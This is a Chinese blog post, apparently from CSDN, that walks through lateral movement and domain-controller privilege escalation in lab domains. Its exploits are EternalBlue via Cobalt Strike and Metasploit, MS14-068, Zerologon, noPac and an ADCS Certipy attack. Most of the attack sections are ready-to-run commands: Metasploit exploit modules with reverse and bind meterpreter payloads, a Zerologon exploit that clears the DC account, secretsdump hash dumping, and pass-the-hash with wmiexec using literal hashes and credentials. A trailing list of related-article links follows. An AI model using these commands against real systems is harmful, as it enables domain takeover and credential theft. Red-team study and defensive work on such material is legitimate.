【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝
文章目录
- 章节点
- 横向移动-系统漏洞-CVE-2017-0146(永恒之蓝)
- 影响版本
- 插件检测-横向移动
- CS联动MSF-检测&利用
- 横向移动-域控提权-CVE-2014-6324
- 横向移动-域控提权-CVE-2020-1472(NetLogon)
- 漏洞背景
- 漏洞原理
- 影响版本
- 横向移动-域控提权-CVE-2021-42287
- 前提条件
- 影响版本
- python版本EXP
- 利用过程
- C#版本EXP
- 利用过程:
- 横向移动-域控提权-CVE-2022-26923(ADCS攻击)
- 概述
- 影响
- 前提条件
章节点
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP,Plink,DCOM,SSH;Exchange,LLMNR投毒,Kerberos_TGS,GPO&DACL,域控提权漏洞,约束委派,数据库攻防,系统补丁下发执行,EDR定向下发执行等。
面试时总会提问一些域控提权漏洞细节,特此补充
横向移动-系统漏洞-CVE-2017-0146(永恒之蓝)
CVE-2017-0146(MS17010)
影响版本
Windows 7 8.1 10; Windows Server 2008 2012 2016
随着新系统初始状态已经打上了补丁,漏洞利用将会越来越局限
插件检测-横向移动
CS联动MSF-检测&利用
cs(各种插件)只支持漏洞检测,不支持漏洞的利用,所以将新建一个会话移交给msf进行进一步的利用
1、CS创建外联监听器
2、CS执行联动MSF
也可以手工在cs输入命令
spawn back_msf
3、MSF监听联动配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8787
run
4、添加路由
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
5、检测模块(检测是否存在永恒之蓝漏洞)
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.3.21-32 //设置扫描目标段
set threads 5 //设置扫描线程数
run
6、利用模块
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标 #set rhosts 192.168.3.21-32 //设置扫描范围,批量检测与利用
run
横向移动-域控提权-CVE-2014-6324
在域控DC没有打补丁的情况下,普通域成员用户通过MS14-068漏洞生成高权限用户票据,导入内存之后即可连接(10小时有效期)
见往期文章PTT横向移动CVE-2014-6324 漏洞利用
https://blog.csdn.net/weixin_53009585/article/details/129788657
横向移动-域控提权-CVE-2020-1472(NetLogon)
漏洞背景
未经身份验证的攻击者只需要能访问域控的135端口即可通过NetLogon远程协议连接域控并重置域控机器账户的hash,从而导致攻击者可以利用域控的机器账户导出域内所有用户的Hash(域控的机器账户默认具有DCSync权限),进而接管整个域
漏洞原理
NetLogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭据的情况下通过认证。通过认证后,调用NetLogon协议中RPC函数NetrServerpasswordSet2来重置域控机器账户的Hash,进而接管全域
影响版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows
Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core
installation) Windows Server 2012 Windows Server 2012 (Server Core
installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server
Core installation) Windows Server 2016 Windows Server 2016 (Server
Core installation) Windows Server 2019 Windows Server 2019 (Server
Core installation) Windows Server, version 1903 (Server Core
installation) Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
poc检测:
https://github.com/SecuraBV/CVE-2020-1472.git
exp重置域账号密码:
https://github.com/blackarrowsec/redteam-research
https://github.com/dirkjanm/CVE-2020-1472
恢复密码:
https://github.com/risksense/zerologon
https://github.com/SecureAuthCorp/impacket
0、获取计算机名:
nbtscan -v -h 192.168.3.21
1、连接DC清空凭证:
proxychains python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21
2、获取域内HASH:
proxychains python3 secretsdump.py OWA2010CN-GOD\$@192.168.3.21 -just-dc -no-pass
3、连接域控PTH:
python wmiexec.py -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21
4、后续恢复密码:
横向移动-域控提权-CVE-2021-42287
前提条件
一个域内普通账号与密码
Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
影响版本
Windows基本全系列(未打补丁)
python版本EXP
https://github.com/WazeHell/sam-the-admin
利用过程
windows下(貌似不能使用):报错 ‘KRB5CCNAME’ 不是内部或外部命令,也不是可运行的程序
或批处理文件。
看了下github项目详情 只能在kali下运行
等了两年都没有再更新了……
kali下:这里的kali是22年版本,靶机也是之前的god.org中的DC,旨在使用域内普通用户账号利用漏洞获得域控DCsystem权限。当然还是需要使用代理
C#版本EXP
项目地址:https://github.com/cube0x0/noPac
利用过程:
1、使用代理后:
修改Host绑定域名和IP
2、扫描探针:
noPac scan -domain god.org -user webadmin -pass admin!@#45
3、利用连接:
noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec \\owa2010cn-god.god.org cmd
横向移动-域控提权-CVE-2022-26923(ADCS攻击)
项目地址:https://github.com/ly4k/Certipy
Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。
概述
当Windows系统的Active Directory证书服务(CS)在域上运行时,由于机器账号中的dNSHostName属性不具有唯一性,域中普通用户可以将其更改为高权限的域控机器账号属性,然后从Active Directory证书服务中获取域控机器账户的证书,导致域中普通用户权限提升为域管理员权限。
影响
Win8.1、Win10、Win11、WinServer2012R2、WinServer2016、WinServer2019、WinServer2022等版本
前提条件
1、一个域内普通账号
2、域内存在证书服务器
DC没有安装Active Directory证书服务
DC已安装Active Directory证书服务
Kali添加访问域内信息 /etc/hosts
192.168.3.130 xiaodi.local
192.168.3.130 xiaodi-WIN-3C7SS32SQ6R-CA
192.168.3.130 WIN-3C7SS32SQ6R.xiaodi.local
获取CA结构名和计算机名
certutil -config - -ping
域内信息
192.168.1.15
test Pass123
xiaodi-WIN-3C7SS32SQ6R-CA
WIN-3C7SS32SQ6R.xiaodi.local
1、申请低权限用户证书:
certipy req 'xiaodi.local/test:Pass123@WIN-3C7SS32SQ6R.xiaodi.local' -ca xiaodi-WIN-3C7SS32SQ6R-CA -template User -debug
2、检测证书
certipy auth -pfx test.pfx
3、创建一个机器账户:
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 addComputer pwnmachine 'CVEPassword1234*'
4、设置机器账户属性(dNSHostName和DC一致):
python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.130 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["WIN-3C7SS32SQ6R.xiaodi.local"]'
5、再次申请证书:
certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.130' -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C7SS32SQ6R-CA
6、检测证书:
certipy auth -pfx ./win-3c7ss32sq6r.pfx -dc-ip 192.168.3.130
7、导出HASH:
python3 secretsdump.py 'xiaodi.local/win-3c7ss32sq6r$@WIN-3C7SS32SQ6R.xiaodi.local' -hashes :10e02bef2258ad9b239e2281a01827a4
8、利用HASH:
python3 wmiexec.py xiaodi.local/administrator@192.168.3.130 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd
【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝相关推荐
- 内网安全——域控提权-CVE-2020-1472NTLM中继攻击
目录 (一)横向移动-域控提权-CVE-2020-1472 0x01 漏洞原理 0x02 利用过程 重置密码: 恢复密码:
- 内网学习之MySQL服务提权
利用MySQL提权原理: 1.具有mysql的root权限,且mysql以system权限运行. 2.具有执行sql语句的权限,webshell或者外连皆可 UDF提权 UDF(user define ...
- 域控 批量导入 用户_kerberos域用户提权分析
2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响.该漏洞允许攻击者将域内任意用户权限,提升到域管理员级 ...
- 内网安全:域内信息收集
目录 环境搭建 域基础知识 工作组和域 现实背景 常规信息收集 方式一:操作系统命令执行 常用总结 方式二:使用CS插件 关键信息收集 密码抓取测试 自动化信息收集工具 ADFind BloodHou ...
- 【内网安全】域信息收集应用网络凭据CS插件AdfindBloodHound
域信息收集&应用网络凭据&CS插件&Adfind&BloodHound 环境搭建 域基础知识 工作组和域 背景与思路 常规信息类收集-应用&服务&权限等 ...
- 域渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍
本文讲的是域渗透提权分析工具 BloodHound 1.3 中的ACL攻击路径介绍, 简介和背景 2014年,Emmanuel Gras和Lucas Bouillot在" 信息通信技术研讨会 ...
- [内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)
简介 CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD ...
- 【内网安全】域横向CobalStrikeSPNRDP
演示案例: • 域横向移动RDP传递-Mimikatz • 域横向移动SPN服务-探针,请求,导出,破解,重写 • 域横向移动测试流程一把梭哈-CobaltStrike初体验 案例1-域横向移动RDP ...
- 【内网安全】域横向PTHPTKPTT哈希票据传递
Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...
最新文章
- Java获取当前路径和读取文件
- 算法-------求众数
- python中开关_pyq中的开关按钮
- java selector 源码_Java NIO核心组件-Selector和Channel
- 论文浅尝 | 知识库问答中关系检测的学习表示映射
- oracle宣传视频下载,1300首 Audiomachine 背景音乐电影宣传预告片配乐合辑(23集)...
- ruby on rails连接mysql_ruby on rails 连接mysql数据库
- [九省联考2018]秘密袭击coat
- matlab 关于double和im2double
- 语言混编之java调用c_Java通过JNI调用C语言库
- android 视频地址解析,Android使用webview解析视频并播放
- xpath 解析离线网页解析本地网页解析本体html文件
- 样条曲线、样条函数、python绘画样条曲线
- 学信认证使用Jetbrains教育授权方式
- 批量修改MP3文件信息
- 设计模式(创建型模式)-抽象工厂模式
- Linux网络编程8——线程池模型
- Design Compiler工具学习笔记(7)
- 2022.12.14 英语背诵
- SAAS产品设计原则及产品架构特点